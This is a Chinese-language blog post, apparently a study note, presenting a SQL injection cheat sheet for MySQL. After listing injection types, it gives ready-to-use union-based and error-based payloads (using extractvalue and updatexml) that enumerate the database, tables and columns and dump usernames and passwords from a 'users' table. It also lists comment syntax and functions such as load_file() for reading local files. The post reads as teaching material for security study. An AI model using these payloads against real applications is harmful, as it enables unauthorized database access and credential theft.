首页 > 数据库 >SQL注入

SQL注入

时间:2024-02-01 23:55:18浏览次数:31  
标签:information 0x7e concat SQL 注入 select schema

SQL注入

注入分类

依据注入点类型分类

数字型的注入

字符串类型的注入

搜索型注入

依据提交方式分类

GET注入

POST注入

COOKIE注入

HTTP头注入(XFF注入、UA注入、Referer注入)

依据获取信息的方式分类

基于布尔的盲注

基于时间的盲注

基于报错的注入

联合查询注入

堆查询注入(可同时执行多条语句)

联合注入

判断是否存在SQL注入(检查闭合符号是否符号,注释是否被过滤,-1)

1' or 1=1#

查询列(报错就说明列数不对,选择上一位)

1' order by 3#


1' union select 1,database()#


1' union select 1,group_concat(table_name)  from information_schema.tables where table_schema = database()#

列(将查询到的表名放到''里)

1' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users'#

查询(需要查询的值放到select后)

1' union select username,password from users#

报错注入

extractvalue函数

正常语法:extractvalue(xml_document,Xpath_string)
第一个参数:xml_document是string格式,为xml文档对象名称
第二个参数:Xpath_String是Xpath格式字符串
作用:从目标xml中返回包含所查询值的字符串


1'or(extractvalue(1,concat(0x7e,(select database()))))#


1'or(extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))#


1'or(extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))))#


1'or(extractvalue(1,concat(0x7e,(select group_concat(username,password) from users))))#

updatexml

正常语法:updatexml(xml_document,xpath_string,net_value)
第一个参数:xml_document是string形式,为xml文档对象的名称
第二个参数:xpath_string是xpath格式的字符串
第三个参数:new_value是string格式,替换查找到的负荷条件的数据
作用:改变文档中符合条件的节点值


1'or updatexml(1,concat(0x7e,(select database()),0x7e),1)#


1'or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#


1'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#


1'or updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)#

关于注释符

/**/

-- (后面有空格)

--+

关于函数释义

information_schema数据库中三个很重要的表:

​    information_schema.schemata: 该数据表存储了mysql数据库中的所有数据库的库名

​    information_schema.tables: 该数据表存储了mysql数据库中的所有数据表的表名

​    information_schema.columns: 该数据表存储了mysql数据库中的所有列的列名

0x7e = ~

count():返回某列行数

rand():随机输出一个小于1的正数

floor():输出的结果取整

group by语句:结果分组

concat():连接两条语句

limit:数据库中的排序

关于mysql常见函数

version():查询数据库的版本

user():查询数据库的使用者

database():数据库

system_user():系统用户名

session_user():连接数据库的用户名

current_user:当前用户名

load_file():读取本地文件

@@datadir:读取数据库路径

@@basedir:mysql安装路径

@@version_complie_os:查看操作系统

标签:information,0x7e,concat,SQL,注入,select,schema
From: https://www.cnblogs.com/yang-ace/p/18002372

相关文章

  • mysql数据库应用
    一:安装数据库管理工具1.进入navicat官网https://navicat.com.cn/2.下载navicatformysql,选免费试用也可直接购买3.安装好后一直点下一步即可二:数据库创建1.新建链接mysql,输入连接名和密码(连接名任意取,密码输入之前设置的密码)2.右键mysql新建数据库,输入你取的数据库......
  • Mysql超详细安装配置教程(保姆级)
    一、下载Mysql从官网下载MySQL,这里我选用的是Mysql8.0.34版本   二、安装Mysql下载完成后直接双击进行安装,打开后的页面如下所示:“DeveloperDefault”是开发者默认“Serveronly”仅作为服务器安装“Clientonly”仅作为客户端安装“Full”是完整安装“Custom”......
  • PostgreSQL10 内置分区表
    创建分区表的主要语法包含两部分:创建主表和创建分区。建主表语法如下:CREATETABLEtablename(...)[PARTITIONBY{RANGEILIST)({columnnameI(expression))创建主表时须指定分区方式,可选的分区方式为RANGE范围分区或LIST表分区,并指定宇段或表达式作为......
  • SpringBoot3 整合 SQLite3 + MybatisPuls
    !!前置要求!!假设你已经掌握SpringBoot3、Maven、Mybaits、MybatisPuls。假设你已经新建好SQLite3测试库。如果没有可以按此结构新建,保存到任意位置。1.项目结构2.依赖注意SpringBoot3版本这边用最新的打包失败,所以改用3.1.2pom.xml<?xmlversion="1.0"encoding="......
  • MySQL之过滤条件
    【一】筛选过滤条件【1】查询语句--查询当前表中的指定字段的数据selectid,namefromempwhereid>3;【2】创建数据表createdatabaseemp_data;useemp_data;createtableemp( idintnotnulluniqueauto_increment,namevarchar(20)notnull,sexen......
  • MySQL介绍
    一、数据库的介绍,什么是数据库数据库其实就是一块基于网络通信的应用程序每个人都有开发一块数据库的能力【1】关系型数据库MySQLOracledb2accesssqlserver这些数据库都采用关系模型来组织数据,并且支持SQL查询语言。【2】非关系型数据库RedisMongoDBMemcache......
  • 关于Qt MySQL有QMYSQL驱动,但是Driver not loaded问题。
    首先,说一下我当时的问题,控制台显示有QMYSQL驱动,但是就是检测不到报错没有驱动,数据库连接不成功。 一开始是一直在复制粘贴.dll和.lib,但是还是不行,一直试一直拖好久都没解决这个问题。因为我sqlite可以用,所以也不着急搞MySQL,但是每次一有时间,看到MySQL不能使就不舒服,就像再调......
  • mysql: error while loading shared libraries: libncurses.so.6: cannot open shared
    查找没有libncurses.so.5,可能有libncurses.so不同版本的文件,使用命令find/-name'libncurses*'复制+覆盖软链接先复制到lib64文件夹,再用软链接重新覆盖一下[root@lab-aliyunwzx]#cp/home/wll/miniconda3/lib/libncurses.so.6/lib64[root@lab-aliyunwzx]#cd/lib6......
  • 软件测试/测试开发/全日制|MySQL安装最全教程
    MySQL的下载与安装、基本使用、系统服务制作MySQL简介MySQL是一种关系型数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。安装与下载1、下载流程访问官方(www.mysql.com)点击‘DOWNLOADS’,进入下载界面下拉,找到‘My......
  • sqli-bypass
    提示说明:—————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99